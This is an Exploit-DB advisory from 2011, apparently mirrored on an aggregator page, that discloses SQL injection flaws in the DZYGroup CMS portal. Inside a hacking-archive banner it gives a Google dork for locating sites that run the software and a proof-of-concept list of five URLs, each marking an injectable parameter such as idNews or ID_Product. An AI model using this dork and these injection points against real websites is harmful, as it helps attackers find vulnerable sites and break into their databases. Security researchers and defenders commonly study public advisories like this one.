DZYGroup CMS Portal – Multiple SQL Injections

• Exploit Database
• 13 阅读

• 作者： Netrondoank
  日期： 2011-08-04
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/17606/

• .__.__.__ __ 
  |__|| _______ __||__ _________ || __ ___________ 
  |||/ \||\|\\__\ _/ ___\||/ // __ \___ \
  |||_|Y Y\|/ Y\/ __ \\\___|<\___/|| \/
  |__|____/__|_|/____/|___|(____/\___>__|_ \\___>__| 
  \/ \/ \/ \/ \/\/
  .org
  ################################ Archieve an Resource About Hacking ###############
  #################### ####################
  #
  # Exploit Title: DZYGroup Portal Remote Sql Injection Vulnerability
  # Author: Netrondoank Aka netron
  # home Page: http://www.ilmuhacker.org
  # Forum : http://www.indotek.or.id
  # Vendor or Software Link: http://www.dzygroup.com/portfolio.php
  # Version: N/A
  # Category:: webapps
  # Google dork: "Powered by DZYGroup"
  # Tested on: Linux Back Track 5
  
  ####################################################################
  #Proof Of Concept [POC]
  
  http://site/[path]/newsDetail.asp?idNews=[Sqli]
  http://site/[path]/articledetail.php?id=[Sqli]
  http://site/[path]/prodetail.asp?Lang=EN&ID_Product=[Sqli]
  http://site/[path]/subcategory.asp?Lang=EN&ID_Category=22&ID_SubCategory=[Sqli]
  http://site/[path]/newsdetail.php?id=[Sqli]
  
  
  #########################################################################################
  #Greetz To:
  Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com
  packetstormsecurity.org, Exploit-id.com ,securityreason.com ,securityfocus.com
  ##########################################################################################
  ###############################Archieve an Resource About Hacking--Ilmuhackerdotorg ####